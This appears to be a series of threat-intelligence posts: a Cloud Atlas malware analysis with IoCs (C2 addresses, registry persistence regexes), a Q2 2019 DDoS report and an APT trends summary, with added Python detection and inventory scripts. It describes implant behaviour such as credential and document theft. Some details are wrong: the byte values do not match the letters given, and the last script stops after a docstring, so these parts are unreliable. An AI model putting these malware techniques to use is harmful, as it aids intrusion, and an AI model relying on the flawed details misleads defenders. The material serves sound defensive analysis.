Cloud Atlas hasn’t changed its TTPs (Tactics, Techniques and Procedures) since 2018 and still relies on its existing, effective tactics and malware to compromise high-value targets.

The Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high-profile victims. These emails carry Office documents that use malicious remote templates, whitelisted per victim, hosted on remote servers. We described one of the techniques used by Cloud Atlas in 2017, and our colleagues at Palo Alto Networks also wrote about it in November 2018.

Previously, Cloud Atlas dropped its “validator” implant named “PowerShower” directly, after exploiting the Microsoft Equation Editor vulnerability (CVE-2017-11882) combined with CVE-2018-0802. In recent months we have seen a new infection chain involving a polymorphic HTA, a new polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second-stage modular backdoor that we disclosed five years ago in our first blog post about the group, which remains unchanged.

Let’s meet PowerShower

PowerShower, named and previously disclosed by Palo Alto Networks in their blog post (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. Cloud Atlas has used this malware since October 2018, first as a validator and now as a second stage. The differences between the two versions lie mostly in the anti-forensics features of the validator version of PowerShower.

The PowerShower backdoor – even in its later developments – takes three commands:

Command: 0x80 (ASCII “P”)
  The first byte of the “PK” magic. The implant saves the received content as a ZIP archive under %TEMP%\PG.zip.

Command: 0x79 (ASCII “O”)
  The first byte of “On resume error”. The implant saves the received content as a VBS script under “%APPDATA%\Microsoft\Word\[A-Za-z]{4}.vbs” and executes it with wscript.exe.

Default
  If the first byte matches neither 0x80 nor 0x79, the content is saved as an XML file under “%TEMP%\temp.xml”. The script then loads the file, parses the XML to extract the PowerShell commands, Base64-decodes them and invokes IEX. After executing the commands, the script deletes “%TEMP%\temp.xml” and sends the content of “%TEMP%\pass.txt” to the C2 via an HTTP POST request.

A few modules deployed by PowerShower have been seen in the wild, such as:

  • A PowerShell document stealer module which uses 7zip (present in the received PG.zip) to pack and exfiltrate *.txt, *.pdf, *.xls or *.doc documents smaller than 5MB modified during the last two days;
  • A reconnaissance module which retrieves a list of the active processes, the current user and the current Windows domain. Interestingly, this feature is present in PowerShower but the condition leading to the execution of that feature is never met in the recent versions of PowerShower;
  • A password stealer module which uses the open-source tool LaZagne to retrieve passwords from the infected system.

We haven’t yet seen a VBS module dropped by this implant, but we think that one of the VBS scripts dropped by PowerShower is a dropper for the group’s second-stage backdoor documented in our 2014 article.

And his new friend, VBShower

During its recent campaigns, Cloud Atlas used a new “polymorphic” infection chain that no longer relies on PowerShower directly after infection, but instead executes a polymorphic HTA hosted on a remote server, which drops three different files on the local system:

  • A backdoor that we name VBShower, which is polymorphic and replaces PowerShower as a validator;
  • A tiny launcher for VBShower;
  • A file computed by the HTA that contains contextual data such as the current user, domain, computer name and a list of active processes.

This “polymorphic” infection chain is an attempt to defeat IoC-based defences: each piece of code is unique per victim, so it cannot be hunted on the host by file hash.

The VBShower backdoor has the same philosophy as the validator version of PowerShower. Its aim is to complicate forensic analysis by trying to delete all the files contained in “%APPDATA%\..\Local\Temporary Internet Files\Content.Word” and “%APPDATA%\..\Local Settings\Temporary Internet Files\Content.Word\”.

Once these files have been deleted and persistence has been achieved in the registry, VBShower sends the context file computed by the HTA to the remote server and tries, every hour, to fetch a VBS script from the remote server via HTTP and execute it.

At the time of writing, two VBS files have been seen pushed to the target computer by VBShower. The first is an installer for PowerShower and the second is an installer for the Cloud Atlas second-stage modular backdoor, which communicates with a cloud storage service via WebDAV.

Final words

Cloud Atlas remains very prolific in Eastern Europe and Central Asia. The actor’s massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets.

Unlike many other intrusion sets, Cloud Atlas has not switched to open-source implants in its recent campaigns to make itself harder to distinguish from other actors. More interestingly, this intrusion set hasn’t changed its modular backdoor, even five years after its discovery.

IoCs

Some emails used by the attackers
  • infocentre.gov@mail.ru
  • middleeasteye@asia.com
  • simbf2019@mail.ru
  • world_overview@politician.com
  • infocentre.gov@bk.ru
VBShower registry persistence
  • Key : HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[a-f0-9A-F]{8}
  • Value : wscript //B “%APPDATA%\[A-Za-z]{5}.vbs”
VBShower paths
  • %APPDATA%\[A-Za-z]{5}.vbs.dat
  • %APPDATA%\[A-Za-z]{5}.vbs
  • %APPDATA%\[A-Za-z]{5}.mds
VBShower C2s
  • 176.31.59.232
  • 144.217.174.57
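As an added example (not Cloud Atlas code and not a Kaspersky tool), the following Python script applies the registry persistence and path IoCs listed above to an exported HKCU Run key: it parses a .reg export, flags values whose command line matches wscript //B "%APPDATA%\<5 letters>.vbs", rates the hit higher when the value name is also 8 hex characters, and lists the sibling .vbs.dat and .mds files to collect before the Run value is removed. The sample export, value names and file stems are constructed for illustration.

```python
"""Hunt for VBShower Run-key persistence in an exported HKCU Run key.

Added example written for this page; it is not Cloud Atlas code and not a
Kaspersky tool.  It applies the published IoCs:
  value name = 8 hex characters        (HKCU\...\Run\[a-f0-9A-F]{8})
  value data = wscript //B "%APPDATA%\<5 letters>.vbs"
and lists the sibling artefacts (.vbs, .vbs.dat, .mds) to collect per hit.
"""
import re
from typing import Dict, List

RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"

# Patterns transcribed from the report's "VBShower registry persistence" IoCs.
NAME_RE = re.compile(r"^[0-9a-fA-F]{8}$")
DATA_RE = re.compile(
    r'^wscript(?:\.exe)?\s+//B\s+"?%APPDATA%\\([A-Za-z]{5})\.vbs"?$',
    re.IGNORECASE,
)
# Value lines in a .reg export look like  "name"="data"  with \\ and \" escapes.
VALUE_LINE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')

# Constructed sample export (not real telemetry): one benign autorun, one entry
# matching the full IoC, and one launcher whose value name is not hex.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"3fa9c01e"="wscript //B \"%APPDATA%\\Qwzrt.vbs\""
"Backup"="wscript //B \"%APPDATA%\\Abcde.vbs\""
'''


def _unescape(s: str) -> str:
    """Undo .reg string escaping: backslash-quote and double-backslash."""
    return s.replace('\\"', '"').replace("\\\\", "\\")


def parse_run_key(reg_text: str) -> Dict[str, str]:
    """Return {value_name: data} for string values under the HKCU Run key."""
    values: Dict[str, str] = {}
    in_run_key = False
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_run_key = line[1:-1].lower() == RUN_KEY.lower()
            continue
        if not in_run_key:
            continue
        m = VALUE_LINE_RE.match(line)
        if m:
            values[_unescape(m.group(1))] = _unescape(m.group(2))
    return values


def find_vbshower_persistence(values: Dict[str, str]) -> List[dict]:
    """Return one finding per Run value whose command line matches the IoC.

    The launcher command line is the decisive indicator; a value name that is
    also 8 hex characters raises the confidence from "medium" to "high".
    """
    findings: List[dict] = []
    for name, data in values.items():
        m = DATA_RE.match(data.strip())
        if not m:
            continue
        stem = m.group(1)
        findings.append({
            "value_name": name,
            "command": data,
            "confidence": "high" if NAME_RE.match(name) else "medium",
            # Sibling files from the report's "VBShower paths" list, to be
            # collected before the Run value is removed.
            "artifacts": [
                f"%APPDATA%\\{stem}.vbs",
                f"%APPDATA%\\{stem}.vbs.dat",
                f"%APPDATA%\\{stem}.mds",
            ],
        })
    return findings


def scan_reg_export(reg_text: str) -> List[dict]:
    """Parse an export and return the VBShower findings."""
    return find_vbshower_persistence(parse_run_key(reg_text))


if __name__ == "__main__":
    for f in scan_reg_export(SAMPLE_REG_EXPORT):
        print(f'[{f["confidence"]}] {f["value_name"]} -> {f["command"]}')
        for path in f["artifacts"]:
            print("    collect:", path)
```

On a live host, the input would come from `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg` (the export is UTF-16; decode it before passing the text in).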

DDoS attacks in Q2 2019

5 August, 2019 - 12:00

News overview

The second quarter of 2019 turned out to be richer than the first in terms of high-profile DDoS attacks. True, most of the campaigns that attracted media attention appeared to be politically, rather than commercially, motivated — and that despite the fact that some security experts discern a clear fall in hacktivism in recent years.

Let’s begin with an attack that is technically outside the chronological framework of this report, since it took place on March 5 (but was reported in early May). It was targeted against a computer system regulating the supply of electricity to various districts of Los Angeles and Salt Lake City. Power supply systems in California and Wyoming also experienced problems. This is a relatively rare case of an attack on a power grid in a densely populated area. The attack was large-scale, but relatively primitive. It did not cause any power outages, but there were “disruptions in the normal operation of the systems,” as the US Department of Energy described the incident. As to the purpose and perpetrators of the attack, no information was forthcoming.

In the second half of April, there were also numerous DDoS attacks against Ecuador. As stated by the country’s deputy minister for information and communications, the websites of public institutions experienced 40 million cyber attacks of various kinds, including DDoS. The web pages of the Central Bank, the Ministry of Foreign Affairs, and the Presidential Office suffered the most. The wave of attacks was hacktivist in nature: the attackers were protesting the new government’s decision to strip Julian Assange of political asylum. To cope with the onslaught of digital indignation, Ecuador had to seek help from Israeli experts.

In early June, a powerful DDoS attack hit Telegram. The attack was carried out primarily from Chinese IP addresses, which gave founder Pavel Durov reason to link it to the demonstrations in Hong Kong; in his words, the political opposition there uses Telegram to organize protests, which Beijing takes a very dim view of.

The only headline attack this quarter seemingly driven by commercial considerations targeted video game developer Ubisoft on June 18 — just before the release of its new Operation Phantom Sight expansion for the game Rainbow Six Siege. It caused connection problems for many players, and even provoked calls on Reddit for better DDoS protection.

The largest would-be DDoS attack in Q2 turned out to be a false alarm. In late June, some segments of the Internet experienced operational issues worthy of a major DDoS offensive, but the actual cause lay elsewhere. As it turned out, a small ISP in Pennsylvania had made a configuration error, turning itself into a priority route for some Cloudflare traffic. The provider could not handle the load, and thousands of websites serviced by Cloudflare went down as a result. The WhatsApp and Instagram malfunctions were also attributed to this. It is worth noting that such Internet outages happen quite often; in this case, the scale of the problem and the involvement of Cloudflare led to speculation about a potential DDoS attack.

Meanwhile, law enforcement agencies continue to work on reducing the number of DDoS attacks within their zone of responsibility. For instance, late March saw the arrest of 19-year-old Englishman Liam Reece Watts, accused of two attacks against the websites of Greater Manchester and Cheshire police.

Note also that this quarter confirmed our earlier hypothesis about the link between the decline in the number of DDoS attacks and the rising popularity of cryptocurrency mining: NSFOCUS published a 2018 report that drew a clear correlation between fluctuations in cryptocurrency prices and the number of DDoS attacks.

Quarter trends

According to Kaspersky DDoS Protection data, this quarter turned out to be rather less eventful than the previous one. As such, the number of attacks foiled by our protection systems fell by 44 p.p. This lull is readily explained by the traditional summer decline in cybercriminal activity. That said, compared with Q2 2018, the total number of attacks actually increased by 18 p.p., which confirms our theory about the recovery of the DDoS market. The growth trend observed since the beginning of 2019 still persists.

It should be noted that the seasonal drop in activity had little impact on attacks more technically complex (both to organize and repel): their share fell by only 4 p.p. against the previous quarter. But compared to the same period last year, the difference is significant and upward — in Q2 2019 “smart” attacks saw 32 p.p. growth. The share of such attacks among all others continues to rise steadily: It increased both against last quarter (by 9 p.p.) and Q2 2018 (by 15 p.p.).

The duration of DDoS sessions also continues to grow steadily in absolute and relative terms (the longest of the defeated attacks, which was also the longest smart attack, lasted for 75 minutes — an impressive figure given that most attacks in this segment get filtered in the early stages). In many ways, the overall growth is due to the increased duration of technically complex attacks, whose average and maximum times grew against both the previous quarter and, even more so, the previous year.


Comparison of the number and duration of standard and smart attacks for Q2 2018, Q1 2019 and Q2 2019 (download)

Therefore, the traditional spring/summer quarter decline can be put down to the drop in the share of non-smart attacks, since it is a time when amateur DDoSers are sitting exams and lying on the beach.

In the world of professional cybercriminals, the picture is different: the indicators for more complex and hence more dangerous attacks show steady growth. This is especially evident when compared with the same period last year. The growth relative to Q1 is also clear to see, although less dramatic (as we predicted in our previous quarterly report). The latest figures already point to a stable trend. It will be very interesting to observe how the situation unfolds over the next quarter: will we see further growth, or will the market stabilize at the current level?

Statistics Methodology

Kaspersky Lab has a long history of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.

A part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C&C servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q2 2019.

In the context of this report, an incident is counted as a single DDoS attack only if every interval between the botnet's activity periods is shorter than 24 hours. For example, if the same web resource is attacked by the same botnet with an interval of 24 hours or more between activity periods, this is counted as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.
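The counting rule above is easy to get subtly wrong (grouping by target alone, or treating a gap of exactly 24 hours as continuation), so here it is as an added example. This is not Kaspersky's DDoS Intelligence code: the input format, (botnet_id, target_ip, timestamp) tuples standing for intercepted bot commands, and the sample events are constructed for illustration; the 24-hour gap rule and the per-botnet split are taken from the methodology text.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Two activity periods of one botnet against one target belong to the same
# attack only if they are separated by less than this gap (page methodology).
MAX_GAP = timedelta(hours=24)


def count_attacks(events):
    """Group bot-command observations into DDoS attacks.

    events: iterable of (botnet_id, target_ip, timestamp) tuples, one per
    intercepted command (constructed input format, an assumption).
    Returns a list of (botnet_id, target_ip, start, end) tuples, one per attack.
    """
    by_key = defaultdict(list)
    for botnet, target, ts in events:
        # Different botnets hitting the same target are separate attacks,
        # so the grouping key includes the botnet.
        by_key[(botnet, target)].append(ts)

    attacks = []
    for (botnet, target), times in by_key.items():
        times.sort()
        start = end = times[0]
        for ts in times[1:]:
            if ts - end >= MAX_GAP:
                # Gap of 24 hours or more: close the current attack, open a new one.
                attacks.append((botnet, target, start, end))
                start = ts
            end = ts
        attacks.append((botnet, target, start, end))
    return attacks


def unique_targets(events):
    """Unique targets are counted by unique IP address, as in the report."""
    return len({target for _, target, _ in events})


def longest_attack_hours(attacks):
    """Duration of the longest attack, in hours."""
    return max((end - start).total_seconds() / 3600 for _, _, start, end in attacks)


# Constructed sample: three botnet/target combinations over two days.
_T0 = datetime(2019, 4, 8, 0, 0)
SAMPLE_EVENTS = [
    ("mirai-A", "203.0.113.10", _T0),
    ("mirai-A", "203.0.113.10", _T0 + timedelta(hours=2)),
    ("mirai-A", "203.0.113.10", _T0 + timedelta(hours=10)),
    ("mirai-A", "203.0.113.10", _T0 + timedelta(hours=40)),   # 30 h gap: second attack
    ("xor-B", "203.0.113.10", _T0 + timedelta(hours=1)),      # other botnet, same target
    ("xor-B", "203.0.113.10", _T0 + timedelta(hours=25)),     # exactly 24 h: second attack
    ("mirai-A", "203.0.113.11", _T0 + timedelta(hours=3)),    # other target
]

if __name__ == "__main__":
    found = count_attacks(SAMPLE_EVENTS)
    print(len(found), "attacks against", unique_targets(SAMPLE_EVENTS), "unique targets")
    print("longest attack: %.1f h" % longest_attack_hours(found))
```

On the sample the seven observations collapse to five attacks against two unique targets, and the longest one runs ten hours. The boundary case matters for the duration figures later in the report: an attack that goes quiet for a day and resumes is two short attacks, not one long one.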

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky Lab. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.

Quarter summary
  • In this quarter, China once again was the most targeted region by number of attacks (63.80%), followed by the US (17.57%) and Hong Kong (4.61%).
  • There was little movement in the Top 3, but lower down there again appeared countries not usually associated with high levels of DDoS activity — this time it was the Netherlands (4th with 1.54%) and Taiwan (7th with 1.15%).
  • The Top 10 by number of unique targets generally coincides with the ranking by number of attacks: China (55.17%), US (22.22%), and Hong Kong (4.53%) make up the podium here again. They are joined by Taiwan (1.61%) and Ireland (1%).
  • This quarter’s choppiest month was April, which included peak attack time; the quietest was May immediately after.
  • Statistically, the biggest share of attacks came on Monday (17.55%), while Sunday was the calmest day (10.45%).
  • The longest attack (509 hours) in Q2 significantly outperformed the previous quarter’s leader, and set an all-time record since these reports began. Despite that, the overall proportion of prolonged attacks declined this quarter.
  • The largest share of junk traffic in Q2 still consisted of SYN flooding (82.43%), followed by UDP (10.94%). However, HTTP and TCP traffic swapped places: the latter nudged ahead on 3.26%, while the former scored only 2.77%.
  • The shares of Windows- and Linux-based botnets barely changed against the previous quarter.
  • The geographical rating list by number of botnet C&C servers is dominated by the US (44.14%), followed by the Netherlands (12.16%) and the UK (9.46%). Interestingly, this quarter’s Top 10 had no place for Russia.
Attack geography

The Top 3 countries by number of attacks against targets located there remained almost unchanged this quarter: China is still in first place, although its share dropped by about 4 p.p. to 63.80%. In second place is the US with practically the same share as before (17.57%), while third place goes to Hong Kong (4.61%), whose share also changed very little.

The trend of past quarters continues, with the Top 10 again hosting some unexpected guests. This time, they were the Netherlands, ranked fourth with 1.54%, and Taiwan in seventh position with a 1.15% slice. But whereas the Netherlands is not a complete stranger to the Top 10, having entered in 2016 and flirted with it on other occasions, the result represents significant growth in Taiwan’s indicators.

The Top 10 said goodbye to France and Saudi Arabia, and Canada dropped from fourth to eighth, although in numerical terms its share actually rose to 0.93%. The leaderboard was propped up by Vietnam (0.68%), while the UK rose one position to sixth (1.20%). Singapore remains in fifth place, although its share also climbed (to 1.25%).


Distribution of DDoS attacks by country, Q1 and Q2 2019 (download)

The distribution of the number of unique targets corresponds more or less to the distribution of the number of attacks. The first four places coincide: China posted 55.17% (down, again by about 4 p.p.), the US 22.22% (up by about 1 p.p.), Hong Kong 4.53% (down by a slender 0.2 p.p.), and the Netherlands 2.34% (a significant change, since the country was nowhere to be seen in last quarter’s Top 10).

As for the remaining Top 10 permutations, besides the Netherlands, Taiwan took sixth place (1.61%) and Ireland came ninth with a share of 1%. Meanwhile, Poland, Germany, and Saudi Arabia departed the Top 10, while France (0.9%) dropped from seventh place to last, despite losing only 0.1 p.p.


Distribution of unique DDoS-attack targets by country, Q1 and Q2 2019 (download)

Dynamics of the number of DDoS attacks

The second quarter, like the first, was relatively calm, with no sudden spikes. The most activity was observed at the beginning of the quarter, and the peak day was April 8 (538 attacks). This was followed by a gradual decline throughout the following month, with the calmest day being May 9 (79 attacks). In early June, DDoS attack organizers perked up somewhat, but the end of the month saw another slump.


Dynamics of the number of DDoS attacks in Q2 2019 (download)

The most dangerous weekday in Q2 from a DDoS perspective was Monday (17.55%), snatching the laurel wreath from Saturday. This bucked the trend of recent quarters in which the greatest activity was observed in the middle and at the end of the week. Sunday remains the quietest day (10.45%), and there is also relative calm on Fridays (13.11%). All other days of the week, the attacks are spread more or less evenly.


Distribution of DDoS attacks by day of the week, Q1 and Q2 2019 (download)

Duration and types of DDoS attacks

The longest attack in Q2 2019 lasted 509 hours (a fraction over 21 days), and was directed against Chinese telecom operator China Unicom. It is the longest attack ever recorded in this series of quarterly reports. Last quarter’s longest attack was approximately 1.7 times shorter (289 hours).

Despite the new record, the overall share of long-duration attacks this quarter declined significantly. Only attacks lasting from 100 to 139 hours (0.11%) remained at the same level, while the share of attacks of 140 hours or more almost halved (from 0.21 to 0.13%). Most significantly of all, the share of medium-duration attacks — from 50 to 99 hours — was slashed by almost two-thirds, accounting for 0.54% of all attacks against last quarter’s figure of 1.51%. The proportion of 5–19 hour attacks fell only slightly.

Accordingly, the share of attacks of no more than four hours increased: from 78.66% to 82.69%.


Distribution of DDoS attacks by duration (hours), Q1 and Q2 2019 (download)

In terms of DDoS-attack types, SYN flooding is still the most popular, although its share dipped by roughly 1.5 p.p. against the previous quarter to 82.43%. In second place is UDP flooding, whose figure, on the contrary, climbed by 2 p.p. to 10.94%. TCP requests rose to third place with a share of 3.26%, while the percentage of HTTP traffic, conversely, fell to 2.77%. Last place still belongs to ICMP flooding, with a share of 0.59%.


Distribution of DDoS attacks by type, Q2 2019 (download)

The distribution of botnet attacks by family remains roughly the same as in the previous quarter, with assaults against Linux systems still ahead by a wide margin. Although Xor activity faded once more, this decline was more than offset by the rise in the number of Mirai-based attacks.


Ratio of Windows/Linux botnet attacks, Q1 and Q2 2019 (download)

Botnet distribution geography

In terms of geographical distribution of botnet C&C servers, the US (44.14%) remains on top. It is joined in the Top 10 by the Netherlands (12.16%) and the UK (9.46%). China only managed fifth position (4.95%), while South Korea’s share (1.80%) was only good enough for second-to-last place. In addition, this quarter’s Top 10 welcomed Greece (1.35%), but pushed out Romania and, far more surprisingly, Russia.


Distribution of botnet C&C servers by country, Q2 2019 (download)

Conclusion

As in several past quarters, the Top 10 geographical distributions continue to amaze. This may be not only because DDoS masterminds are looking for new places where the arm of the law is not so long and electricity prices are not too high, but because the threshold for breaking into the Top 10 is quite low. As a rule, the Top 3 leaders scoop up most of the attacks, so the shares of all other regions remain relatively small. That being the case, even small fluctuations can lead to a country rocketing up or down the rating lists.

True, this cannot completely account for the vanishing act of traditional leaders like South Korea and Russia (the latter’s absence in the Top 10 by number of C&C botnets is particularly striking). If the rearrangement is genuinely linked to a tightening of the legal screws, we should expect the rating lists to feature countries with poorly developed cybercrime laws.

The lack of DDoS spikes this quarter is clearly due to seasonal fluctuations; the summer months are traditionally more serene, if only relatively speaking.

APT trends report Q2 2019

1 August 2019 - 12:00

For two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They aim to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q2 2019.

Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact ‘intelreports@kaspersky.com’.

The most remarkable findings

In April, we published our report on TajMahal, a previously unknown APT framework that has been active for the last five years. This is a highly sophisticated spyware framework that includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, document and cryptography key stealers, and even its own file indexer for the victim's computer. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins we have ever seen in an APT toolset. The malware features its own indexer, emergency C2s, the ability to steal specific files from external drives when they become available again, and much more. There are two different packages, self-named 'Tokyo' and 'Yokohama', and the targeted computers we found include both packages. We think the attackers used Tokyo as the first-stage infection, deployed the fully functional Yokohama package on interesting victims, and then left Tokyo in place for backup purposes. So far, our telemetry has revealed just a single victim, a diplomatic body from a country in Central Asia. This raises the question: why go to all that trouble for just one victim? We think there may be other victims that we haven't found yet. This theory is supported by the fact that we couldn't see how one of the files in the VFS was used by the malware, opening the door to the possibility of additional versions of the malware that have yet to be detected.

On May 14, the Financial Times reported that a zero-day vulnerability in WhatsApp had been exploited, allowing attackers to eavesdrop on users, read their encrypted chats, turn on the microphone and camera and install spyware that allows even further surveillance, such as browsing through a victim's photos and videos, accessing their contact list and more. In order to exploit the vulnerability, the attacker simply needs to place a WhatsApp call to the victim; the call does not have to be answered. This specially crafted call triggers a buffer overflow in WhatsApp's call handling, allowing the attacker to take control of the application and execute arbitrary code in it. Apparently, the attackers used this method not only to snoop on people's chats and calls but also to exploit previously unknown vulnerabilities in the operating system, which allowed them to install applications on the device. The vulnerability affects WhatsApp for Android prior to 2.19.134, WhatsApp Business for Android prior to 2.19.44, WhatsApp for iOS prior to 2.19.51, WhatsApp Business for iOS prior to 2.19.51, WhatsApp for Windows Phone prior to 2.18.348 and WhatsApp for Tizen prior to 2.18.15. WhatsApp released patches for the vulnerability on May 13. Some have suggested that the spyware may be Pegasus, developed by the Israeli company NSO.
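Turning the affected-version list above into an inventory check is where teams usually slip: dotted versions must be compared component by component, not as strings, or 2.19.134 is judged older than 2.19.44. The following is an added example, not WhatsApp's or Kaspersky's code; the patched-version thresholds are the ones listed in the text, while the product keys and the device inventory are constructed for illustration.

```python
import re

# First patched release per product, as listed in the text. The product keys
# are an assumption chosen for this example.
PATCHED = {
    "whatsapp-android": "2.19.134",
    "whatsapp-business-android": "2.19.44",
    "whatsapp-ios": "2.19.51",
    "whatsapp-business-ios": "2.19.51",
    "whatsapp-windows-phone": "2.18.348",
    "whatsapp-tizen": "2.18.15",
}


def parse_version(version):
    """Split a dotted version into a tuple of ints so it compares numerically.

    Plain string comparison gets this wrong: "2.19.134" < "2.19.44" as strings,
    because "1" sorts before "4".
    """
    parts = re.findall(r"\d+", version)
    if not parts:
        raise ValueError(f"unparseable version {version!r}")
    return tuple(int(p) for p in parts)


def is_affected(product, version):
    """True when the installed version is strictly older than the patched one."""
    try:
        fixed = PATCHED[product]
    except KeyError:
        raise KeyError(f"no patch threshold known for {product!r}") from None
    return parse_version(version) < parse_version(fixed)


def affected_devices(inventory):
    """Return the inventory entries that still run a vulnerable build."""
    return [d for d in inventory if is_affected(d["product"], d["version"])]


# Constructed inventory (hypothetical devices, not real telemetry).
SAMPLE_INVENTORY = [
    {"device": "android-01", "product": "whatsapp-android", "version": "2.19.130"},
    {"device": "android-02", "product": "whatsapp-business-android", "version": "2.19.134"},
    {"device": "ios-01", "product": "whatsapp-ios", "version": "2.19.50"},
    {"device": "ios-02", "product": "whatsapp-business-ios", "version": "2.19.51"},
    {"device": "wp-01", "product": "whatsapp-windows-phone", "version": "2.18.348"},
    {"device": "tizen-01", "product": "whatsapp-tizen", "version": "2.18.9"},
]

if __name__ == "__main__":
    for d in affected_devices(SAMPLE_INVENTORY):
        print(f"{d['device']}: {d['product']} {d['version']} is below {PATCHED[d['product']]}")
```

Note that WhatsApp Business for Android at 2.19.134 is reported as patched: it is well above its own 2.19.44 threshold even though the string sorts below it.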

Russian-speaking activity

We continue to track the activities of Russian-speaking APT groups. These groups usually show a particular interest in political activities, but apart from a couple of interesting exceptions we failed to detect any remarkable examples during the last quarter.

We did find a potential connection between Hades and a leak at the RANA institute. Hades is possibly connected to the Sofacy threat actor, most notable for being behind Olympic Destroyer, as well as ExPetr and several disinformation campaigns such as the Macron leaks. Earlier this year, a website named Hidden Reality published leaks allegedly related to an Iranian entity named the RANA institute. This was the third leak in two months that disclosed details of alleged Iranian threat actors and groups. Close analysis of the materials, the infrastructure and the dedicated website used by those behind the leak led us to believe that these leaks might be connected to Hades. This might be part of a disinformation campaign in which Hades helps to raise doubts about the quality of the information leaked in other cases from earlier this year.

Zebrocy continued adding new tools to its arsenal written in various programming languages. We found Zebrocy deploying a compiled Python script, which we call PythocyDbg, within a Southeast Asian foreign affairs organization: this module primarily provides for the stealthy collection of network proxy settings and communications debug capabilities. In early 2019, Zebrocy shifted its development efforts to Nimrod/Nim, a programming language with syntax resembling both Pascal and Python that can be compiled down to JavaScript or C targets. Both the Nim downloaders that the group mainly uses for spear-phishing and other Nim backdoor code are currently being produced by Zebrocy and delivered alongside updated compiled AutoIT scripts, Go, and Delphi modules. The targets of this new Nimcy downloader and backdoor set include diplomats, defense officials and ministry of foreign affairs staff, from whom the attackers want to steal login credentials, keystrokes, communications, and various files. The group appears to have turned its attention towards the March events involving Pakistan and India, and unrelated diplomatic and military officials, while maintaining ongoing access to local and remote networks belonging to Central Asian governments.

We also recently observed some interesting new artifacts that we relate to Turla with varying degrees of confidence.

In April 2019, we observed a new COMpfun-related targeted campaign using new malware. The Kaspersky Attribution Engine shows strong code similarities between the new family and the old COMpfun. Moreover, the original COMpfun is used as a downloader in one of the spreading mechanisms. We called the newly identified modules Reductor after a .pdb path left in some samples. We believe the malware was developed by the same COMpfun authors that, internally, we tentatively associate with the Turla APT, based on victimology. Besides the typical RAT functions (upload, download, execute files), Reductor's authors put a lot of effort into manipulating installed digital root certificates and marking outbound TLS traffic with unique host-related identifiers. The malware adds embedded root certificates to the target host and allows operators to add additional ones remotely through a named pipe. The technique used by Reductor's developers to mark TLS traffic is the most ingenious part. The authors don't touch the network packets at all; instead they analyzed the Firefox source and the Chrome binary code in order to patch the corresponding pseudo-random number generation (PRNG) functions in the browser process's memory. Browsers use the PRNG to generate the "client random" field at the very beginning of the TLS handshake. Reductor writes the victim's unique, encrypted hardware- and software-based identifiers into this "client random" field, so every TLS session the browser opens carries a mark that can be recognized on the wire without breaking the encryption.
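Because the mark travels in cleartext (the client random is sent before any key is negotiated), a network-side hunt is possible. The following is an added example, not Reductor code and not Kaspersky's detection logic: it parses the ClientHello out of a raw TLS record, pulls the 32-byte client random, and flags a source host whose randoms all share the same leading bytes across several handshakes. The assumption, which the text does not state, is that an implant writing a per-host identifier into the random makes some byte range constant for that host, whereas a healthy PRNG practically never repeats it. The prefix length, the host IPs and the ClientHello bytes are all constructed for the example.

```python
import hashlib
import struct
from collections import defaultdict


def client_random(record):
    """Extract the 32-byte client random from a TLS record carrying a ClientHello.

    Layout: 5-byte record header (type 0x16, version, length), 4-byte
    handshake header (type 0x01, 3-byte length), 2-byte client_version,
    then the 32-byte random.
    """
    if len(record) < 5 + 4 + 2 + 32:
        raise ValueError("record too short for a ClientHello")
    content_type, _version, length = struct.unpack("!BHH", record[:5])
    if content_type != 0x16:
        raise ValueError("not a TLS handshake record")
    body = record[5:5 + length]
    if len(body) < 4 or body[0] != 0x01:
        raise ValueError("not a ClientHello")
    hello_len = int.from_bytes(body[1:4], "big")
    hello = body[4:4 + hello_len]
    if len(hello) < 2 + 32:
        raise ValueError("truncated ClientHello")
    return hello[2:34]


def build_client_hello(random_bytes):
    """Constructed minimal ClientHello (one cipher suite, no extensions)."""
    if len(random_bytes) != 32:
        raise ValueError("client random must be 32 bytes")
    hello = (b"\x03\x03" + random_bytes
             + b"\x00"                 # empty session id
             + b"\x00\x02\x13\x01"     # one cipher suite
             + b"\x01\x00")            # null compression only
    handshake = b"\x01" + len(hello).to_bytes(3, "big") + hello
    return b"\x16\x03\x01" + len(handshake).to_bytes(2, "big") + handshake


def find_marked_hosts(flows, prefix_len=4, min_handshakes=3):
    """Report source hosts whose client randoms all share a fixed prefix.

    flows: iterable of (src_ip, record_bytes). Hosts with fewer than
    min_handshakes parsable ClientHellos are not judged. Returns a dict
    {src_ip: shared_prefix_hex}. The fixed-prefix heuristic is an assumption.
    """
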